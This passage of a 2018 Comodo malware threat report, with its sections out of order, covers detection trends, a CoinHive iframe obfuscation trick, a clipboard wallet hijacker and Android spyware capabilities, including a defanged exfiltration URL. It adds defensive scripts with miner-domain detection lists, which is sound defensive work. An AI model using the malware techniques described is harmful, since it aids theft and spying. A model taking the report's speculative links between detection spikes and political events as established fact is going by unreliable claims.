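A packed executable is easier to recognise than to unpack: stock UPX writes its own section names into the PE section table, and a "modified" UPX build that renames them still leaves a section full of compressed data, which shows up as near-maximal byte entropy. The script below is an added example written for this report, not Comodo's detection logic or anything from the UPX project; it parses the PE headers by hand so that it runs offline, and the three executables it inspects are minimal constructed fixtures built by the `build_pe` helper, not real samples (they contain no code and cannot run). The threshold of 7.0 bits per byte and the section-name list are my own choices.

```python
import math
import random
import struct
from collections import Counter

# Section names written by stock UPX. A modified UPX (MUPX) build often renames them,
# so this check alone is not sufficient; entropy catches the renamed case.
UPX_SECTION_NAMES = {b"UPX0", b"UPX1", b"UPX2"}

# Shannon entropy (bits per byte) at or above which a section looks compressed or encrypted (assumption).
ENTROPY_THRESHOLD = 7.0


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 for uniform data, close to 8.0 for compressed or encrypted data."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def parse_sections(pe: bytes):
    """Walk the MZ/PE headers and return [(section_name, raw_bytes)]; raises ValueError on malformed input."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew, = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4                                   # IMAGE_FILE_HEADER
    num_sections, = struct.unpack_from("<H", pe, coff + 2)
    opt_size, = struct.unpack_from("<H", pe, coff + 16)   # SizeOfOptionalHeader
    table = coff + 20 + opt_size                          # first IMAGE_SECTION_HEADER
    sections = []
    for i in range(num_sections):
        hdr = table + 40 * i
        name = pe[hdr:hdr + 8].rstrip(b"\0")
        raw_size, raw_ptr = struct.unpack_from("<II", pe, hdr + 16)  # SizeOfRawData, PointerToRawData
        if raw_ptr + raw_size > len(pe):
            raise ValueError(f"section {name!r} points outside the file")
        sections.append((name, pe[raw_ptr:raw_ptr + raw_size]))
    return sections


def assess_packing(pe: bytes) -> dict:
    """Combine the section-name check with per-section entropy to classify a sample."""
    sections = parse_sections(pe)
    upx_named = [n.decode("ascii", "replace") for n, _ in sections if n in UPX_SECTION_NAMES]
    high_entropy = [
        n.decode("ascii", "replace")
        for n, data in sections
        if len(data) >= 256 and shannon_entropy(data) >= ENTROPY_THRESHOLD
    ]
    if upx_named:
        verdict = "stock UPX section names"
    elif high_entropy:
        verdict = "suspected modified or unknown packer"
    else:
        verdict = "no packer indicators"
    return {"upx_sections": upx_named, "high_entropy_sections": high_entropy, "verdict": verdict}


def build_pe(sections) -> bytes:
    """Constructed test fixture: a minimal PE image with the given [(name, data)] sections. Not a runnable program."""
    e_lfanew = 0x40
    dos_header = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    # Machine=i386, NumberOfSections, TimeDateStamp, PointerToSymbolTable, NumberOfSymbols,
    # SizeOfOptionalHeader=0 (not needed to read the section table), Characteristics.
    file_header = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0x0102)
    data_ptr = e_lfanew + 4 + 20 + 40 * len(sections)
    headers, blobs = b"", b""
    for name, data in sections:
        headers += (name.ljust(8, b"\0")
                    + struct.pack("<IIII", len(data), 0x1000, len(data), data_ptr)
                    + b"\0" * 12 + struct.pack("<I", 0x60000020))
        data_ptr += len(data)
        blobs += data
    return dos_header + b"PE\0\0" + file_header + headers + blobs


# Deterministic pseudo-random bytes stand in for a compressed payload (constructed, not a real sample).
_rng = random.Random(2018)
_COMPRESSED_LIKE = bytes(_rng.getrandbits(8) for _ in range(4096))

SAMPLE_STOCK_UPX = build_pe([(b"UPX0", b"\0" * 256), (b"UPX1", _COMPRESSED_LIKE)])
SAMPLE_RENAMED = build_pe([(b".text", _COMPRESSED_LIKE), (b".rsrc", b"A" * 512)])
SAMPLE_CLEAN = build_pe([(b".text", b"\x55\x8b\xec\x5d\xc3" * 200), (b".data", b"hello world\0" * 40)])

if __name__ == "__main__":
    for label, sample in (("stock UPX", SAMPLE_STOCK_UPX), ("renamed", SAMPLE_RENAMED), ("clean", SAMPLE_CLEAN)):
        print(label, assess_packing(sample))
```

Entropy is a heuristic: legitimately compressed resources, embedded certificates and digitally signed installers also score high, so the verdict is a reason to unpack and look further, not a malware verdict on its own.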
5.3.3 Email Flooder
Email Flooders are malware used to overwhelm an email server with messages in order to "kill" it or shut it down, in a form of denial-of-service (DoS) attack.
The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.
The primary country where Comodo detected this malicious behavior was Germany.
And this timeline shows that while the number of Palevo detections was not high, it was still a persistent threat in Germany.
5.3.4 Virtual Tools
Virtual Tools are programs that can modify or alter malicious files to avoid detection.
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.
The top two countries for Virtual Tools detections were Germany and the US.
This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.
5.3.5 Jokes
"Joke" malware is in fact just what it says: these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.
Such malware is typically only labeled a "Medium" threat because the hacker's intention is not to damage or destroy information, but merely to have fun at the victim's expense.
Germany (de) and the US were the top two countries of detection for Joke malware.
In this timeline you can see that this malware type is not numerous, but still something to be aware of.
5.4 Low Threat Malware Applications
In this section we will cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.
5.4.1 Applications
Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.
In Q2 2018 the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only as a "Potentially Unwanted Application", or PUA, this software is nasty and attempts to install files that run at startup, add drivers, inject processes, alter browser behavior and modify DNS settings.
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.
And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.
5.4.2 Unwanted Applications
The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these Applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip and more.
The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user's homepage, modify the search provider and/or perform other actions users might not have intended. They include free toolbars, adware and "system optimizers".
As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.
And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.
5.4.3 Unsafe Applications
Unsafe applications are seemingly legitimate programs, but in fact are frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite; they include fake anti-virus and free Internet Relay Chat (IRC) clients.
The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to "crack" or patch unregistered copies of Microsoft software. These are referred to as "hacktools" and may be distributed with additional malware that users can install inadvertently.
This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.
This timeline shows that the US, and to a lesser extent Ukraine, have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.
6 Vertical analysis
In this section let's examine unique malware profiles that Comodo identified within specific "verticals", or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the #1 malware family for each Vertical's top malware type.
Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detected not only in one but within multiple verticals, clearly making them a current strategic threat across the world.
First, Kryptik: the New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers, but now has the ability to target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "Clicker" to boost the hit count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.
Second, let's examine "Zbot", which is another name for the "Zeus" Trojan, undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation, and over a decade later Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target's computer already has a Virus and needs to be cleaned.
In conclusion, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them.
7 Geopolitical Intelligence
7.1 USA
This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018. Clearly, the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements, comprising many requests for information related to upcoming changes in US political, military and intelligence activities, after which these agencies immediately began to fulfill these requirements via computer hacking, commonly called cyber espionage, which today takes place on a far greater scale than the public realizes.
7.2 China
This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly, June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services, both foreign and domestic, were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.
7.3 South Korea
National security events always attract the attention of professional hackers, who seek to collect the kind of information that serves as the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes coincided with the annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online: students collect data for academic papers, spies collect data for intelligence reports.
7.4 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike consisting of well over ten times the usual number of detections. One plausible explanation for this activity is that someone, or some institution, was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.
7.5 Armenia
All major geopolitical events today are bathed in malware. The reason is that all activities, from social activities to business, politics or national security affairs, are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information, or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.
7.6 Belarus
A common hacker refrain is that "information wants to be free". Some evidence for it is provided by this timeline of Comodo's virus and trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation aimed at controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was used specifically to disseminate trojan horses, which were then leveraged for some real-world purpose: to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.
7.7 Iraq
There is possibly no hotter topic in information security today than election hacking. In this chart of Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out, and both may be associated with electoral events. In mid-April, Iraq was preparing for a national election, including the question of how to secure the electronic side of the vote. And at the beginning of July (just after the quarter's end), Iraq was preparing for a vote recount following accusations of impropriety at the polls.
7.8 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detections, and sometimes there may be several reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, the highest spike, on May 24, may have had more than one cause. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in the capital, Kyiv, on May 26.
7.9 Croatia
Since the cyberattacks that targeted Estonia in 2007, it has been clear that cyberattacks can be used to punish not only individuals and enterprises but entire nations. In that context, the massive spike in malware detections in Croatia on March 28 (shortly before the quarter began) is interesting: it came a mere day after the Russian government called the Croatian government's decision to expel a Russian diplomat, in solidarity with London over the alleged poisoning of a former Russian spy in England, an "act of hostility".
7.10 Finland, Russia, USA
Finally, let's look at Comodo's virus detections in Finland during Q2 2018. The largest single spike, by far, occurred on the day the press began to report that Donald Trump and Vladimir Putin would hold a summit in the Finnish capital, Helsinki. Geolocation of this virus activity showed that it took place almost exclusively in Helsinki's suburb of Vantaa, where the summit was scheduled to take place. Bear in mind that IP-based geolocation is coarse and that a spike on the day of an announcement is a correlation; it is not evidence that the summit or its venue was targeted.
8 Conclusions
In Q2, Comodo Cybersecurity observed several significant new trends likely to strongly influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but point to possible future cybersecurity scenarios.
The increase in trojan malware over the last quarter suggests that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should assume that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks revealed in the quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a large surge in infections of hosts worldwide with a diversity of malware samples.
Our findings show that malware is becoming more cunning in its delivery methods, more sophisticated in its persistence and much harder for antivirus software to detect. The propagation of fileless malware, the evolution of cryptominers and the use of legitimate tools such as PowerShell for attacks are clear evidence of this uptick in sophistication.
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, which presages new attacks and new mobile malware. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information on them (such as messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. After a successful penetration, perpetrators profit by stealing money, selling confidential information or blackmailing victims.
Moreover, given that the majority of the trojans detected in Q2 were information stealers, another dangerous tendency is visible: cybercriminals are increasingly focused on hunting for confidential data.
Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end users, changing the cybersecurity landscape and forcing IT security departments to update their security measures and probably revamp their security strategies, policies and postures.
About Comodo Cybersecurity
Comodo Threat Research Labs (CTRL) monitors, filters and analyzes malware, ransomware, viruses and other "unknown", potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees), analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day. The Lab also works with trusted partners in academia, government and industry to gain additional insight into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine-learning-powered analytics, artificial intelligence, and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners, and the public community.
Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures, from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint, with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.
Some cryptominers attracted the spotlight of the mass media and cybersecurity researchers, which made them easier for users to detect. In Q2 these cryptominers learned to hide; CoinHive is the clearest example.
3.4 CoinHive changes its skin
CoinHive is a popular JavaScript cryptominer: embed its script in a web page and every visitor's browser mines cryptocurrency for you.
In its plain form the CoinHive script is easy to spot in page source:
Figure: The CoinHive script
After many publications on the subject in the mass media and in cybersecurity reports, users began checking website source code for cryptominers. In the second quarter, perpetrators found a way around this obstacle: they now camouflage CoinHive's presence with URL shorteners.
As a result, the malicious code on a web page looks like this:
Figure: The obfuscated malicious code on a web page
If we decode the string, we find an iframe:
Figure: The iframe loads the URL shortener
The iframe loads the URL shortener. Notice that the width and height of the iframe are set to 1, making it as close to invisible as possible.
Now let's look at the URL https://cnhv.co:
And there we find the familiar link to CoinHive.
Figure: The link to CoinHive
What is the impact of this trick? In a simple scenario, a user visits a CoinHive-infected website. Noticing that her computer's CPU is overloaded, she decides to check the page source but finds no sign of a cryptominer. She concludes that something has gone wrong with her PC, while CoinHive keeps using her computer to mine cryptocoins. The check that still works is to decode any encoded strings in the page and inspect what they load, or to watch the browser's network requests for the shortener and the miner domain behind it.
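As an added example (not code from the report), the following Python scanner implements the check this trick defeats by eye: it pulls quoted Base64-looking literals out of page source, decodes them, and looks inside the result for an iframe that is either pointed at a CoinHive host or sized 1x1. The report does not name the encoding of the string; Base64 is assumed here because it is what atob() consumes. The sample pages, the shortlink path under cnhv.co and the MINER_DOMAINS list are constructed for the example.

```python
"""Static scan of page markup for browser cryptominer loaders, including ones hidden
behind a Base64 blob that document.write()s a 1x1 iframe to a cnhv.co shortlink."""
import base64
import binascii
import re
from urllib.parse import urlparse

# Hosts that served the CoinHive miner or its cnhv.co shortlinks (as named in the report).
MINER_DOMAINS = {"coinhive.com", "coin-hive.com", "cnhv.co"}

# A quoted Base64-looking literal of meaningful length, e.g. the argument of atob("...").
_B64_LITERAL = re.compile(r"""['"]([A-Za-z0-9+/]{24,}={0,2})['"]""")
_IFRAME_TAG = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
_ATTR = re.compile(r"""(\w+)\s*=\s*['"]?([^'"\s>]+)""")
_SCRIPT_SRC = re.compile(r"""<script\b[^>]*\bsrc\s*=\s*['"]([^'"]+)""", re.IGNORECASE)


def host_is_miner(url):
    """True if the URL's host is a known miner domain or one of its subdomains."""
    host = (urlparse(url).hostname or "").lower()
    return any(host == d or host.endswith("." + d) for d in MINER_DOMAINS)


def decode_base64_literals(markup):
    """Yield the plaintext of every quoted Base64 literal that decodes to markup."""
    for match in _B64_LITERAL.finditer(markup):
        try:
            text = base64.b64decode(match.group(1), validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue
        if "<" in text:  # keep HTML; skip binary blobs and random data
            yield text


def iframe_findings(markup, via):
    """Flag iframes that point at a miner host, or that are sized to be invisible."""
    findings = []
    for tag in _IFRAME_TAG.finditer(markup):
        attrs = {k.lower(): v for k, v in _ATTR.findall(tag.group(1))}
        src = attrs.get("src", "")
        tiny = attrs.get("width") in {"0", "1"} and attrs.get("height") in {"0", "1"}
        if host_is_miner(src):
            findings.append({"kind": "miner-iframe", "url": src, "via": via})
        elif tiny:
            # A 1x1 iframe to a generic shortener is suspicious, not proof: a live scanner
            # would follow the redirect chain and apply host_is_miner() to the final URL.
            findings.append({"kind": "hidden-iframe", "url": src, "via": via})
    return findings


def scan_page(markup):
    """Return every miner indicator in the page, in plain markup and inside Base64 blobs."""
    findings = []
    layers = [("plain", markup)] + [("base64", t) for t in decode_base64_literals(markup)]
    for via, layer in layers:
        findings += [{"kind": "miner-script", "url": s, "via": via}
                     for s in _SCRIPT_SRC.findall(layer) if host_is_miner(s)]
        findings += iframe_findings(layer, via)
    return findings


# Constructed samples (not taken from the report's screenshots); the shortlink path is made up.
HIDDEN_IFRAME = '<iframe src="https://cnhv.co/example" width="1" height="1"></iframe>'
OBFUSCATED_PAGE = (
    '<html><body><p>news</p><script>document.write(atob("'
    + base64.b64encode(HIDDEN_IFRAME.encode()).decode()
    + '"));</script></body></html>'
)
DIRECT_PAGE = '<script src="https://coinhive.com/lib/coinhive.min.js"></script>'
CLEAN_PAGE = '<iframe src="https://example.org/embed" width="640" height="360"></iframe>'

if __name__ == "__main__":
    for name, page in [("obfuscated", OBFUSCATED_PAGE), ("direct", DIRECT_PAGE), ("clean", CLEAN_PAGE)]:
        print(name, scan_page(page))
```

The scanner is static and offline, so a 1x1 iframe pointing at a generic shortener is only reported as suspicious; confirming it means following the redirect chain to the final host, which is exactly the step the shortener is meant to put between the page and the miner.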
The next piece of malware in the row prefers not to mine cryptocurrency but to steal it on the fly.
3.5 Cryptocurrency clipboard hijacker intercepts transfers
It would be more accurate to call this program a cryptothief than a cryptominer, because it does not devour an infected machine's resources; instead it steals cryptocurrency outright by redirecting it to the perpetrator.
Cryptocurrency transfers require a wallet address. The address is a long string of mixed letters and digits, so it is almost impossible to remember or to type in manually. That is why users usually copy and paste a wallet address to make a transaction. Cybercriminals regard this copy-paste step as a gap they can use to their advantage.
The cryptocurrency clipboard hijacker checks the clipboard for a copied wallet address. When it finds one, it swaps it for the address of a wallet under the attacker's control, so the unwitting owner of the infected machine delivers the coins straight into cybercriminals' hands. Because the swap happens before the paste, the only check on the user's side is to compare the pasted address, character by character, with the intended one before confirming the transfer.
A new Cryptocurrency Clipboard Hijacker sample can monitor 2,343,286 addresses.
This malware is distributed bundled with the All-Radio 4.27 Portable software. All-Radio 4.27 is a legitimate video and audio player created by Russian developers, but cybercriminals copied the program and added malicious code. The trojanized All-Radio 4.27 was used to spread different types of malware, clipboard cryptocurrency hijackers among them.
Here is an example of a clipboard hijacker attack: a user copied the wallet address 3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs, but the malware changed it to 1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm.
Figure: An example of a clipboard hijacker attack
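A detector for the swap just described, added here as an example rather than taken from the report or from the sample: it models clipboard observations as timestamped strings and raises an alert when one wallet address is replaced by a different wallet address within a couple of seconds. It also includes a Base58Check validator to make a point the report only implies: the attacker's address is itself a perfectly valid address, so checksum validation alone cannot catch a hijack. The address patterns, the 2-second window, the SAMPLE_EVENTS trace and the reference to the pyperclip package are assumptions; the two addresses are the ones from the report's example.

```python
"""Clipboard-hijack detector: flags a copied wallet address being silently replaced.

The clipboard is modelled as a time-ordered list of (seconds, text) observations, which is
what a polling monitor (for example one built on the pyperclip package) would record."""
import hashlib
import re

# Bitcoin address shapes: Base58 legacy/P2SH (1... or 3...) and bech32 (bc1...). Assumed
# patterns for this demo; a production monitor would add Ethereum, Monero and others.
BTC_BASE58 = re.compile(r"^[13][a-km-zA-HJ-NP-Z1-9]{25,34}$")
BTC_BECH32 = re.compile(r"^bc1[02-9ac-hj-np-z]{11,71}$")
_B58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"


def base58check_valid(addr):
    """Verify a Base58Check address: 1 version byte + 20-byte hash + 4-byte double-SHA256 checksum.

    This catches typos and garbled addresses, not hijacks: the attacker's substitute is a valid
    address too, which is why the timing check in detect_hijack() is needed."""
    value = 0
    for ch in addr:
        if ch not in _B58_ALPHABET:
            return False
        value = value * 58 + _B58_ALPHABET.index(ch)
    try:
        raw = value.to_bytes(25, "big")  # leading '1' characters become leading zero bytes
    except OverflowError:
        return False
    payload, checksum = raw[:21], raw[21:]
    return hashlib.sha256(hashlib.sha256(payload).digest()).digest()[:4] == checksum


def looks_like_wallet(text):
    """Shape check only; cheap enough to run on every clipboard change."""
    text = text.strip()
    return bool(BTC_BASE58.match(text) or BTC_BECH32.match(text))


def detect_hijack(events, window=2.0):
    """Return one alert per clipboard change that swaps one wallet address for a different one
    within `window` seconds. A hijacker rewrites the clipboard right after the user's copy, so
    the swap lands within milliseconds; a human re-copying a second address takes far longer."""
    alerts = []
    for (t_prev, before), (t_now, after) in zip(events, events[1:]):
        swapped = before != after and looks_like_wallet(before) and looks_like_wallet(after)
        if swapped and t_now - t_prev <= window:
            alerts.append({"t": t_now, "copied": before.strip(), "replaced_with": after.strip()})
    return alerts


# Constructed clipboard trace using the two addresses from the report's example.
SAMPLE_EVENTS = [
    (0.0, "meeting notes"),
    (5.0, "3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs"),   # the user copies the intended address
    (5.2, "1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm"),   # 200 ms later the clipboard holds another one
    (60.0, "3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs"),  # a deliberate re-copy a minute later: no alert
]

if __name__ == "__main__":
    for alert in detect_hijack(SAMPLE_EVENTS):
        print("clipboard hijack suspected at t=%.1fs: %s -> %s"
              % (alert["t"], alert["copied"], alert["replaced_with"]))
```

The window is the whole heuristic: the hijacker must rewrite the clipboard before the user pastes, so the replacement always follows the copy almost immediately, while a legitimate second address is copied seconds or minutes later. A monitor built on this logic should also alert on the replaced address itself so the user can compare it with what they pasted.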
Figure: Spread of Clipboard Hijacker malware around the world
Although cryptominers have decreased in number, they are coming back in updated disguises and promise to become a serious new challenge for cybersecurity departments and vendors.
4 Android Devices Under Siege
4.1 Spying, Stealing, Mining
Android devices are rapidly becoming high-value targets for cybercriminals and malware authors. This is not surprising, because today almost any smartphone is a treasure trove of information for perpetrators. People increasingly use smartphones for financial operations, but those are not the only jackpot for attackers: every smartphone today contains a wealth of confidential information about its owner.
If the victim is a CEO, politician or other VIP, the content of the mobile device can be sold at the highest prices. Perpetrators can sell stolen information to interested parties or extort money by blackmailing their victims. Nor are cybercriminals the only ones hunting for smartphone content: intelligence agencies and business competitors want to know everything about their targets. Add jealous spouses tracking every move of their partners and parents wanting to monitor their children, and it is easy to see why Android-oriented malware is a growing business.
Today spying is the number one purpose of Android malware. In Q2, Comodo analysts detected a variety of spying tools that penetrate mobile devices and extract data from them. The whole family of these digital spooks is shown in the graph.
Figure: The digital spooks
Like real-world spies, digital agents impersonate legitimate entities, posing as innocent applications or hiding malicious code inside legitimate software. Like real spies, they seek to remain invisible, constantly change disguises to avoid detection, and hone their tradecraft from version to version.
4.1.1 KevDroid
The first is named KevDroid. It is distributed in three versions:
Version 1: Naver Defender
Version 2: Netease Defender
Version 3: PU
Figure: Disguises of KevDroid
The first version, disguised as the Naver Defender application, covertly penetrates a mobile device and hides its icon from the launcher screen to avoid detection. This sample has multiple spying capabilities. It steals account details (contacts, ID, name, phone numbers and the owner's email address). It grabs SMS messages and the associated metadata. It attempts to read call logs (number, name, type, duration), emails (email type) and contacts' photos. After extracting the data, the malware encrypts it with AES and sends it to the attackers' server at http://cgalim[.]com/admin/hr/pu/pu.php?do=upload (defanged).
KevDroid records the victim's every phone call, then encrypts the recording and uploads it to the cybercriminals' server. In addition, it collects information about currently running services, installed apps and the launcher name.
The second version, Netease Defender, has additional spying abilities. It takes control of the device camera and covertly records the victim's activity, then sends the video to the attackers' server.
Version 3 of KevDroid takes photos, records calls and creates a list of files on the device. It also extracts the web history, account and contact details, and device information.
People assume they are safe if they download apps exclusively from the official Google Play store. This assumption can be costly: the first version of the Desert Scorpion spyware was spread via the official Google Play store. The spyware was camouflaged as a chat application called Dardesh. When a user downloaded and ran it, the app covertly connected to the cybercriminals' Command and Control server and downloaded the spyware onto the device. From that moment the spyware constantly tracked all events on the infected device. Social networks were another means of dissemination.
Version 1: Dardesh, Google Play Services, Instant Apps
Version 2: Settings
Figure: Disguises of Desert Scorpion
The second version of Desert Scorpion records calls, audio and video, uninstalls other apps, sends and receives messages, and tracks the location of the smartphone: a capability set comparable to commercial spyware such as FinSpy and Pegasus. Beyond the capabilities of the first version, it collects information about installed applications, extracts metadata and makes changes on the victim's device.
4.1.2 Zoo Park
The next member of the spy family, Zoo Park, has 4 different versions:
Version 1: Telegram Groups, انتخاب دھم
Version 2: Postrall, Yes For Referendum, انتخاب دھم
Version 3: Celebs Gone Wild, جریدة النھار الكویتیة, 剑侠挂机
Version 4: VPN Easy, DroFirewall, m_android
Figure: Disguises of Zoo Park
The first version impersonates the Telegram app. It extracts account and contact details, encodes them with Base64 and sends them to the attackers' server. The second version has additional abilities: extracting SMS details, device information (including IMEI, network operator name, SDK version, OS version, etc.), call log details and external storage content.
The third version is included in spyware named "Spymaster Pro" and can:
Enable and disable the GPS services
Record audio and send it to the Command & Control server
Upload image files
Collect information about installed applications
Collect browser data
Send SMS and read outgoing SMS
The fourth version is spread in malicious clones of popular legitimate applications such as VPN Easy and DroFirewall. In addition to the abilities of the previous versions, it includes some additional tricks:
Extracts photos, audio and video
Records the screen
Executes shell commands
Records calls
4.1.3 MikeSpy
Some spyware samples specifically hunt for messenger data, like the next digital spook, MikeSpy.
Figure: Disguises of MikeSpy (Virtual Girlfriend)
MikeSpy camouflages itself as a Virtual Girlfriend application, but instead of a girlfriend it delivers a bundle of malicious abilities:
Takes control of the Bluetooth adapter
Extracts data about accounts, contact details and installed apps
Extracts data from the WhatsApp message database and the related keys
Uploads the collected data to the cybercriminals' server via FTP
4.1.4 Xloader
The next spyware, Xloader, combines spying with a purposeful hunt for banking applications on the device. It uses trust-inspiring cover icons imitating Facebook and Google Chrome.
Versions 1 to 3: FaceBook, Chrome
Figure: Disguises of Xloader
After infection, Xloader connects to its C&C server and executes the following commands:
Extract the device information
Delete SMS
Set ringer mode
Monitor incoming SMS messages
Clear memory
Check for the presence of the following banking applications: com.wooribank.pib.smart, com.kbstar.kbbank, com.ibk.neobanking, com.sc.danb.scbankapp, com.shinhan.sbanking, com.hanabank.ebk.channel.android.hananbank, nh.smart, com.epost.psf.sdsi, com.kftc.kjbsmb, com.smg.spbs
Extract contact details
Keep Wi-Fi always on
Version 2 can execute additional commands:
Send SMS and read outgoing SMS
Enable and disable the Wi-Fi connection
Access a location specified by the attackers
Make recordings
Make calls
4.1.5 Stalker Spy
The next piece of malware in the row is Stalker Spy. As you can see, it is the champion in the number of masks it puts on to deceive users.
